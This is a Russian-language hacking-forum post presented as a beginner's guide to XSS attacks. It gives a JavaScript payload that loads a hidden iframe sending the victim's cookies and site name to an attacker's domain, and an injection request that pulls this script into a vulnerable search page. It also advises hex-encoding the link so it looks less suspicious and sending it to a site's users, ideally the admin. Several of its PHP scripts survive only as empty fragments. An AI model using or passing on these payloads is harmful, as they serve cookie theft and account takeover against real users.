![]() |
XSS, - введение, статья для начинающих by Jenizix
Автор: Jenizix, WHB (Web-Hack Board)
Ну найти в интернете описание XSS-бага я думаю труда не составит... Перейдем сразу к использованию: -= 3-2-1 go! =- Сначала зарегистрируем ( или возьмем имеющийся ) домен с хостингом ( пофиг какого уровня =)))) ) с поддержкой PHP... допустим мы зарегили xss.host.ru... Создадим файл xss.js с таким содержимым: Код:
document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://xss.host.ru/xss.php'+'?['+location.host+']:'+document.cookie+'"></iframe>');Этот JavаScript будет открывать невидимый iframe на странице, в котором будет гризиться наш скрипт принимающий куки... + ему будет передаваться имя сайта откуда куки были стырены. Я выбрал тег <iframe> т.к. у некоторых отключен показ рисунков => тег <img> не прокатит... да и попапы могут резаться... Теперь создадим файл xss.php: Код:
<?Закинем оба файла в веб-директорию нашего сайта... ну вощем чтоб они были доступны как Цитата:
Цитата:
Ну теперь найдем бажный сайт с XSS уязвимостью. Допустим уязвимость будет тут: Цитата:
запрос типа Код:
find.php?find=<script src=http://xss.host.ru/xss.js></script>Цитата:
-= Шифруемся =- НО! В открытую этот линк кидать не стоит... палевно... сделаем так, напишем php-скрипт для кодировки символов в hex и для разкодировки из hex: hex.php: Код:
<?Код:
<?например нам нужно чтобы юзер прошелся по этой ссылке: Цитата:
Цитата:
Цитата:
это hex представление текста: <script src=http://xss.host.ru/xss.js></script> Теперь наша ссылка будет выглядеть вот так: Цитата:
Как видите, не очень и палиться =))) Теперь осталось скинуть этот линк какомунибудь юзеру ( а лучше админу ) сайта site.ru и ждать его куков ( если конечно они там юзаются )... Куки могут быть в hex-виде... тут нам придет на помощ unhex.php: Цитата:
Теперь у нас есть полноценные скрипты для проведения XSS-атаки. Еще можно наш xss.js прогнать через hex.php чтоб еще побольше обезопаситься ))) |
| Текущее время: 18:09. Часовой пояс GMT +3. |
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2026, vBulletin Solutions, Inc. Перевод: zCarot
Copyright ©2004 - 2026 NoWa.cc